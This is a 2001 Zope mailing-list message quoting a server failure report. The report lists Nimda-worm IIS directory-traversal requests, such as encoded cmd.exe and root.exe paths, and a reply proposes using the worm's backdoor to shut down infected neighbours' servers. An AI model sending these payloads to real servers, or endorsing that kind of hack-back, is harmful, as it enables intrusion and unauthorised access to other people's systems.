[Zope] Zope 1 : NIMDA 0

Michael Montagne Michael Montagne <montagne@boora.com>
Thu, 20 Sep 2001 14:08:31 -0700


How do you get that log from Zope?


On Thu, Sep 20, 2001 at 08:30:33PM +0000, Reinoud van Leeuwen wrote:
> On 20 Sep 2001 18:28:43 -0000, you wrote:
> 
> >Failure Report (9/19/2001 - 24 hour report)
> >Listing the top 30 files by the number of failed requests, sorted by the number of failed requests. 
> >
> >reqs: file
> >----: ----
> >1210: /scripts/..%255c../winnt/system32/cmd.exe
> >1210:   /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> >1204: /scripts/..%5c../winnt/system32/cmd.exe
> >1204:   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
> > 615: /scripts/root.exe
> > 615:   /scripts/root.exe?/c+dir
> > 611: /MSADC/root.exe
> > 611:   /MSADC/root.exe?/c+dir
> > 610: /c/winnt/system32/cmd.exe
> > 610:   /c/winnt/system32/cmd.exe?/c+dir
> > 609: /d/winnt/system32/cmd.exe
> > 609:   /d/winnt/system32/cmd.exe?/c+dir
> > 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> > 608:   /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> > 606:   /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > 604: /scripts/..%c1%1c../winnt/system32/cmd.exe
> > 604:   /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> > 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
> > 604:   /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> > 603: /scripts/..%c0%af../winnt/system32/cmd.exe
> > 603:   /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> > 603: /scripts/winnt/system32/cmd.exe
> > 603:   /scripts/winnt/system32/cmd.exe?/c+dir
> > 602: /scripts/..%c1%9c../winnt/system32/cmd.exe
> > 602:   /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> > 598: /scripts/..%252f../winnt/system32/cmd.exe
> > 598:   /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
> >
> >That is a lot of requests! Glad Zope could handle it.
> >
> 
> You can "help" your infected neigbours by remotely turning their
> infected servers off! see
> http://pc.xs4all.nl/default.ida
> 
> (it is a Perl script that uses the same backdoor as the virus itself.
> I've not yet installed perl in Zope, but am working on it ";-)
> 
> -- 
> __________________________________________________
> "Nothing is as subjective as reality"
> Reinoud van Leeuwen       reinoud@xs4all.nl
> http://www.xs4all.nl/~reinoud
> -> when replying to a mailinglist mail, please do  <-
> -> *NOT* cc: me as well. If I read the list I will <-
> -> receive the reply as well!                      <-
> __________________________________________________
> 
> _______________________________________________
> Zope maillist  -  Zope@zope.org
> http://lists.zope.org/mailman/listinfo/zope
> **   No cross posts or HTML encoding!  **
> (Related lists - 
>  http://lists.zope.org/mailman/listinfo/zope-announce
>  http://lists.zope.org/mailman/listinfo/zope-dev )

-- 
Michael Montagne
montagne@boora.com
http://www.boora.com